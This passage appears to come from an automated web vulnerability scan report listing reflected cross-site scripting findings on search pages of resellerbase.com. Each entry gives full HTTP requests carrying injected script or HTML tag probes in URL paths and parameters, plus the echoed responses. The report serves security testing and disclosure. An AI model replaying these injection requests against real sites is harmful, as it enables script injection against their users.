Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/review/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:48:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes/kosmos/images/review/search.php?keyword=search...&Submit3=Search&opt=29b8e3<a>de3f150613b was not found on this server.</p>
...[SNIP]...

2.5609. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/web-hosting/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c4a4b<script>alert(1)</script>ea085508ea5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-servicec4a4b<script>alert(1)</script>ea085508ea5/web-hosting/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:49:45 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-servicec4a4b<script>alert(1)</script>ea085508ea5/web-hosting/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5610. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/web-hosting/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 27946<script>alert(1)</script>d9f5287521e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting27946<script>alert(1)</script>d9f5287521e/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:50:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting27946<script>alert(1)</script>d9f5287521e/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5611. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/web-hosting/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 45940<script>alert(1)</script>f6da0e534ea was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting/themes45940<script>alert(1)</script>f6da0e534ea/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:50:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes45940<script>alert(1)</script>f6da0e534ea/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5612. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/web-hosting/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload b2371<script>alert(1)</script>10273af046a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting/themes/kosmosb2371<script>alert(1)</script>10273af046a/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:50:46 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes/kosmosb2371<script>alert(1)</script>10273af046a/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5613. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/search.php [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/web-hosting/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload c7647<script>alert(1)</script>589e2cba02e was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting/themes/kosmos/imagesc7647<script>alert(1)</script>589e2cba02e/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:50:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes/kosmos/imagesc7647<script>alert(1)</script>589e2cba02e/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5614. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/search.php [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/web-hosting/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload b641c<script>alert(1)</script>fac8cee579f was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting/themes/kosmos/images/search.phpb641c<script>alert(1)</script>fac8cee579f?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:51:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes/kosmos/images/search.phpb641c<script>alert(1)</script>fac8cee579f?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5615. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/web-service/web-hosting/themes/kosmos/images/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload e829e<a>ed3ef33ffb5 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/web-hosting/themes/kosmos/images/search.php?keyword=search...&Submit3=Searche829e<a>ed3ef33ffb5&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:47:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes/kosmos/images/search.php?keyword=search...&Submit3=Searche829e<a>ed3ef33ffb5&opt=2 was not found on this server.</p>
...[SNIP]...

2.5616. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/web-service/web-hosting/themes/kosmos/images/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload ed665<a>af82138d64b was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/web-hosting/themes/kosmos/images/search.php?keyword=search...ed665<a>af82138d64b&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:47:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes/kosmos/images/search.php?keyword=search...ed665<a>af82138d64b&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5617. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/web-hosting/themes/kosmos/images/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 5ac24<script>alert(1)</script>da39714adc0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&5ac24<script>alert(1)</script>da39714adc0=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:49:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&5ac24<script>alert(1)</script>da39714adc0=1 was not found on this server.</p>
...[SNIP]...

2.5618. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/web-service/web-hosting/themes/kosmos/images/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload 4f1ff<a>3679e8e1157 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/web-hosting/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=24f1ff<a>3679e8e1157 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:48:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=24f1ff<a>3679e8e1157 was not found on this server.</p>
...[SNIP]...

2.5619. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/web-hosting/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 98818<script>alert(1)</script>a53943327d0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service98818<script>alert(1)</script>a53943327d0/web-hosting/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:50:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service98818<script>alert(1)</script>a53943327d0/web-hosting/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5620. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/web-hosting/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 7b8e7<script>alert(1)</script>7b369e94025 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting7b8e7<script>alert(1)</script>7b369e94025/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:50:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting7b8e7<script>alert(1)</script>7b369e94025/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5621. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/web-hosting/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload b082e<script>alert(1)</script>8ba851af2be was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting/themesb082e<script>alert(1)</script>8ba851af2be/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:50:30 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themesb082e<script>alert(1)</script>8ba851af2be/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5622. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/web-hosting/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 83a38<script>alert(1)</script>a9531677bc9 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting/themes/kosmos83a38<script>alert(1)</script>a9531677bc9/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:50:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes/kosmos83a38<script>alert(1)</script>a9531677bc9/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5623. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/search.php [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/web-service/web-hosting/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 97d8e<script>alert(1)</script>4abb94bc36a was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /web-service/web-hosting/themes/kosmos/search.php97d8e<script>alert(1)</script>4abb94bc36a?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:50:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes/kosmos/search.php97d8e<script>alert(1)</script>4abb94bc36a?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.5624. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/web-service/web-hosting/themes/kosmos/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 39728<a>eaefc980b36 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/web-hosting/themes/kosmos/search.php?keyword=search...&Submit3=Search39728<a>eaefc980b36&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:47:41 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /web-service/web-hosting/themes/kosmos/search.php?keyword=search...&Submit3=Search39728<a>eaefc980b36&opt=2 was not found on this server.</p>
...[SNIP]...

2.5625. http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/web-service/web-hosting/themes/kosmos/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload adf0b<a>1440e716009 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /web-service/web-hosting/themes/kosmos/search.php?keyword=search...adf0b<a>1440e716009&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/web-service/web-hosting/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:47:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

